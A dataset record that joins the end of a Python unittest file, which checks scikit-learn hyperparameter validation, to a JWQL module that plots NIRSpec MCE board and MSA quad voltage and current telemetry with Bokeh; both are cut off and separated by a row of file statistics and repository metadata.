'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_5(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': -2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_6(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': -0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_7(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': -15,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_8(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 6, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 56,
'loss': 'ls', 'max_depth': 39, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 0.9, 'tol': 6,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- ExtraTrees -------------------#
def test_extratrees_1(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_2(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': 3.6, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_3(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': -2.89, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_4(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': -0.89, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_5(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 78, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1.8, 'min_samples_split': 2.9, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 78,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AdaBoost -------------------#
def test_adaboost_1(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': 1.0, 'loss': 'linear', 'n_estimators': 50,
'random_state': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_2(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': -1.0, 'loss': 'linear', 'n_estimators': -50,
'random_state': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_3(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': 1.0, 'loss': 'linear', 'n_estimators': -50,
'random_state': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- SupportVectorMachines -------------------#
def test_supportvectormachines_1(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': 0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_2(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': -200, 'coef0': -0.8, 'degree': -3, 'epsilon': -0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_3(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': -0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_3(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': 0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
#----------------- LinearRegression --------------------#
def test_linearrregression_1(self):
algorithm = "LinearRegression"
params = {'copy_X': 1.0, 'fit_intercept': 200, 'normalize': 0.0, 'positive': 3}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_linearrregression_2(self):
algorithm = "LinearRegression"
params = {'copy_X': True, 'fit_intercept': True, 'normalize': False, 'positive': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_linearrregression_3(self):
algorithm = "LinearRegression"
params = {'copy_X': "randomvalue", 'fit_intercept': True, 'normalize': False, 'positive': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_1(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': None,'colsample_bynode': None, 'colsample_bytree': None,'gamma': None,'learning_rate': None,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
class TestScikitClusteringAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "clustering"
pass
# ----------------- KMeans -------------------#
def test_kmeans_1(self):
algorithm = "KMeansClustering"
params = {"algorithm":"auto","copy_x":True,"init":"k-means++","max_iter":300,"n_clusters":8,"n_init":10,"tol":0.0001,"verbose":0}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AffinityPropagation -------------------#
def test_affinity_propagation_1(self):
algorithm = "AffinityPropagation"
params = {'affinity':"euclidean","convergence_iter":15,"copy":True,"damping":0.5,"max_iter":200,"preference":None,"verbose":False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- MeanShift -------------------#
def test_mean_shift_1(self):
algorithm = "MeanShift"
params = {'bandwidth':None,'bin_seeding':False,'cluster_all':True,'max_iter':300,'min_bin_freq':1,'n_jobs':None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- Birch -------------------#
def test_Birch_1(self):
algorithm = "Birch"
params = {'branching_factor':50,'compute_labels':True,'copy':True,'n_clusters':3,'threshold':0.5}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- SpectralClustering -------------------#
def test_spectral_clustering_1(self):
algorithm = "SpectralClustering"
params = {'affinity':"rbf","assign_labels":"kmeans","coef0":1,"degree":3,"eigen_solver":None,"eigen_tol":0.0,"gamma":1.0,"n_clusters":8,"n_components":None,"n_init":10,"n_jobs":None,"n_neighbors":10,"verbose":False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AgglomerativeClustering -------------------#
def test_agglomerative_clustering_1(self):
algorithm = "AgglomerativeClustering"
params = {'affinity':"euclidean",'compute_distances':False,'compute_full_tree':False,"distance_threshold":None,"linkage":"single","n_clusters":2}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- DBSCAN -------------------#
def test_dbscan_1(self):
algorithm = "DBScan"
params = {'algorithm':'brute','eps':0.5,'leaf_size':30,'metric':"euclidean",'min_samples':5,'n_jobs':None,'p':2}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- OPTICS -------------------#
def test_optics_1(self):
algorithm = "Optics"
params = {'algorithm':'auto','cluster_method':'xi','eps':None,'leaf_size':30,'max_eps':23,'metric':'minkowski','min_cluster_size':None,'min_samples':5,'n_jobs':None,'p':2,'predecessor_correction':True,'xi':0.05}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- GaussianMixture -------------------#
def test_gaussian_mixture_1(self):
algorithm = "GaussianMixtures"
params = {'covariance_type':"full",'init_params':"kmeans",'max_iter':100,'n_components':1,'n_init':1,'reg_covar':0.000001,'tol':0.001,'verbose':0,'verbose_interval':10,'warm_start':False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
if __name__ == '__main__':
unittest.main() | 63.190167 | 465 | 0.653063 | 8,122 | 68,119 | 5.215957 | 0.03509 | 0.041025 | 0.069965 | 0.084152 | 0.943254 | 0.932301 | 0.925078 | 0.92005 | 0.905061 | 0.899915 | 0 | 0.026581 | 0.184838 | 68,119 | 1,078 | 466 | 63.190167 | 0.736349 | 0.052511 | 0 | 0.643489 | 0 | 0 | 0.320845 | 0.049093 | 0 | 0 | 0 | 0 | 0.197219 | 1 | 0.199747 | false | 0.003793 | 0.003793 | 0 | 0.207332 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
30f0ae9886859f7b0c8075011805f65061cf0601 | 18,159 | py | Python | jwql/instrument_monitors/nirspec_monitors/data_trending/plots/msa_mce_tab.py | falkben/jwql | 4f035a0f48d875cad6cc832431f1d8fda67e520e | [
"BSD-3-Clause"
] | 1 | 2019-09-13T18:18:14.000Z | 2019-09-13T18:18:14.000Z | jwql/instrument_monitors/nirspec_monitors/data_trending/plots/msa_mce_tab.py | falkben/jwql | 4f035a0f48d875cad6cc832431f1d8fda67e520e | [
"BSD-3-Clause"
] | 2 | 2019-09-13T15:03:56.000Z | 2020-08-26T13:44:39.000Z | jwql/instrument_monitors/nirspec_monitors/data_trending/plots/msa_mce_tab.py | falkben/jwql | 4f035a0f48d875cad6cc832431f1d8fda67e520e | [
"BSD-3-Clause"
] | 1 | 2020-10-16T15:49:40.000Z | 2020-10-16T15:49:40.000Z | #! /usr/bin/env python
"""Prepares plots for Temperature tab
Module prepares plots for mnemonics below. Combines plots in a grid and
returns tab object.
Plot 1 - MCE Board 1 (AIC) Voltages
INRSM_MCE_AIC_1R5_V
INRSM_MCE_AIC_3R3_V
INRSM_MCE_AIC_5_V
INRSM_MCE_AIC_P12_V
INRSM_MCE_AIC_N12_V
Plot 2 - MCE Board 1 (AIC) Currents
INRSM_MCE_AIC_3R3_I
INRSM_MCE_AIC_5_I
INRSM_MCE_AIC_P12_I
INRSM_MCE_AIC_N12_I
Plot 3 - MCE Board 2 (MDAC) Voltages
INRSM_MCE_MDAC_1R5_V
INRSM_MCE_MDAC_3R3_V
INRSM_MCE_MDAC_5_V
INRSM_MCE_MDAC_P12_V
INRSM_MCE_MDAC_N12_V
Plot 4 - MCE Board 2 (MDAC) Currents
INRSM_MCE_MDAC_3R3_I
INRSM_MCE_MDAC_5_I
INRSM_MCE_MDAC_P12_I
INRSM_MCE_MDAC_N12_I
Plot (5-8) - QUAD (1-4)
INRSM_MSA_Q(1-4)_365VDD
INRSM_MSA_Q(1-4)_365VPP
INRSM_MSA_Q(1-4)_171VPP
IGDPM_MSA_Q(1-4)_365IDD
IGDPM_MSA_Q(1-4)_365IPP
IGDPM_MSA_Q(1-4)_171RTN
Authors
-------
- Daniel Kühbacher
Use
---
The functions within this module are intended to be imported and
used by ``nirspec_dashboard.py``, e.g.:
::
from .plots.msa_mce_tab import msa_mce_plots
tab = msa_mce_plots(conn, start, end)
Dependencies
------------
User must provide database "nirspec_database.db"
"""
import jwql.instrument_monitors.nirspec_monitors.data_trending.utils.sql_interface as sql
import jwql.instrument_monitors.nirspec_monitors.data_trending.plots.plot_functions as pf
from bokeh.models import LinearAxis, Range1d
from bokeh.plotting import figure
from bokeh.models.widgets import Panel, Tabs, Div
from bokeh.models import ColumnDataSource, HoverTool, Title
from bokeh.layouts import WidgetBox, gridplot, Column
import pandas as pd
import numpy as np
from astropy.time import Time
def aic_voltage(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "MCE Board 1 (AIC)"
p.add_layout(Title(text="Voltages", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "1R5_V", "INRSM_MCE_AIC_1R5_V", start, end, conn, color = "red")
b = pf.add_to_plot(p, "3R3_V", "INRSM_MCE_AIC_3R3_V", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "5_V", "INRSM_MCE_AIC_5_V", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "P12_V", "INRSM_MCE_AIC_P12_V", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "N12_V", "INRSM_MCE_AIC_N12_V", start, end, conn, color = "darkmagenta")
pf.add_hover_tool(p,[a,b,c,d,e])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def aic_current(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Current (A)')
p.grid.visible = True
p.title.text = "MCE Board 1 (AIC)"
p.add_layout(Title(text="Currents", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "3R3_I", "INRSM_MCE_AIC_3R3_I", start, end, conn, color = "blue")
b = pf.add_to_plot(p, "5_I", "INRSM_MCE_AIC_5_I", start, end, conn, color = "red")
c = pf.add_to_plot(p, "P12_I", "INRSM_MCE_AIC_P12_I", start, end, conn, color = "green")
d = pf.add_to_plot(p, "N12_I", "INRSM_MCE_AIC_N12_I", start, end, conn, color = "orange")
pf.add_hover_tool(p,[a,b,c,d])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def mdac_voltage(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "MCE Board 2 (MDAC)"
p.add_layout(Title(text="Voltages", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "1R5_V", "INRSM_MCE_MDAC_1R5_V", start, end, conn, color = "red")
b = pf.add_to_plot(p, "3R3_V", "INRSM_MCE_MDAC_3R3_V", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "5_V", "INRSM_MCE_MDAC_5_V", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "P12_V", "INRSM_MCE_MDAC_P12_V", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "N12_V", "INRSM_MCE_MDAC_N12_V", start, end, conn, color = "darkmagenta")
pf.add_hover_tool(p,[a,b,c,d,e])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def mdac_current(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "MCE Board 2 (MDAC)"
p.add_layout(Title(text="Currents", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "3R3_I", "INRSM_MCE_MDAC_3R3_I", start, end, conn, color = "blue")
b = pf.add_to_plot(p, "5_I", "INRSM_MCE_MDAC_5_I", start, end, conn, color = "red")
c = pf.add_to_plot(p, "P12_I", "INRSM_MCE_MDAC_P12_I", start, end, conn, color = "green")
d = pf.add_to_plot(p, "N12_I", "INRSM_MCE_MDAC_N12_I", start, end, conn, color = "orange")
pf.add_hover_tool(p,[a,b,c,d])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad1_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "Quad 1"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q1_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q1_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q1_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q1_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q1_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q1_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad2_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "Quad 2"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q2_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q2_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q2_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q2_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q2_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q2_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad3_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "Quad 3"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q3_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q3_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q3_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q3_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q3_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q3_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad4_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "Quad 4"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q4_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q4_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q4_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q4_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q4_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q4_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def msa_mce_plots(conn, start, end):
'''Combines plots to a tab
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : tab object
used by dashboard.py to set up dashboard
'''
descr = Div(text=
"""
<style>
table, th, td {
border: 1px solid black;
background-color: #efefef;
border-collapse: collapse;
padding: 5px
}
table {
border-spacing: 15px;
}
</style>
<body>
<table style="width:100%">
<tr>
<th><h6>Plotname</h6></th>
<th><h6>Mnemonic</h6></th>
<th><h6>Description</h6></th>
</tr>
<tr>
<td>MCE Board 1 (AIC) Voltages</td>
<td>INRSM_MCE_AIC_1R5_V<br>
INRSM_MCE_AIC_3R3_V<br>
INRSM_MCE_AIC_5_V<br>
INRSM_MCE_AIC_P12_V<br>
INRSM_MCE_AIC_N12_V<br>
</td>
<td>MCE AIC +1.5V Voltage<br>
MCE AIC +3.3V Voltage<br>
MCE AIC +5V Voltage<br>
MCE AIC +12V Voltage<br>
MCE AIC -12V Voltage<br>
</td>
</tr>
<tr>
<td>MCE Board 1 (AIC) Currents</td>
<td>INRSM_MCE_AIC_3R3_I<br>
INRSM_MCE_AIC_5_I<br>
INRSM_MCE_AIC_P12_I<br>
INRSM_MCE_AIC_N12_I<br>
</td>
<td>MCE AIC Board +3.3V Current<br>
MCE AIC Board +5V Current<br>
MCE AIC Board +12V Current<br>
MCE AIC Board -12V Current<br>
</td>
</tr>
<tr>
<td>MCE Board 2 (MDAC) Voltages</td>
<td>INRSM_MCE_MDAC_1R5_V<br>
INRSM_MCE_MDAC_3R3_V<br>
INRSM_MCE_MDAC_5_V<br>
INRSM_MCE_MDAC_P12_V<br>
INRSM_MCE_MDAC_N12_V<br>
</td>
<td>MCE MDAC +1.5V Voltage<br>
MCE MDAC +3.3V Voltage<br>
MCE MDAC +5V Voltage<br>
MCE MDAC +12V Voltage<br>
MCE MDAC -12V Voltage<br>
</td>
</tr>
<tr>
<td>MCE Board 2 (MDAC) Currents</td>
<td>INRSM_MCE_MDAC_3R3_I<br>
INRSM_MCE_MDAC_5_I<br>
INRSM_MCE_MDAC_P12_I<br>
INRSM_MCE_MDAC_N12_I<br>
</td>
<td>MCE MDAC Board +3.3V Current<br>
MCE MDAC Board +5V Current<br>
MCE MDAC Board +12V Current<br>
MCE MDAC Board -12V Current<br>
</td>
</tr>
<tr>
<td>QUAD (1-4)</td>
<td>INRSM_MSA_Q(1-4)_365VDD<br>
INRSM_MSA_Q(1-4)_365VPP<br>
INRSM_MSA_Q(1-4)_171VPP<br>
IGDPM_MSA_Q(1-4)_365IDD<br>
IGDPM_MSA_Q(1-4)_365IPP<br>
IGDPM_MSA_Q(1-4)_171RTN<br>
</td>
<td>MSA Quad (1-4) Vdd 365 Voltage<br>
MSA Quad (1-4) Vpp 365 Voltage<br>
MSA Quad (1-4) Vpp 171 Voltage<br>
MSA Quad (1-4) Vdd 365 Current<br>
MSA Quad (1-4) Vpp 365 Current<br>
MSA Quad (1-4) Return 171 Current<br>
</td>
</tr>
</table>
</body>
""", width=1100)
plot1 = aic_voltage(conn, start, end)
plot2 = aic_current(conn, start, end)
plot3 = mdac_voltage(conn, start, end)
plot4 = mdac_current(conn, start, end)
plot5 = quad1_volt(conn, start, end)
plot6 = quad2_volt(conn, start, end)
plot7 = quad3_volt(conn, start, end)
plot8 = quad4_volt(conn, start, end)
grid = gridplot([[plot1, plot2],
[plot3, plot4],
[plot5, plot6],
[plot7, plot8]],merge_tools=False)
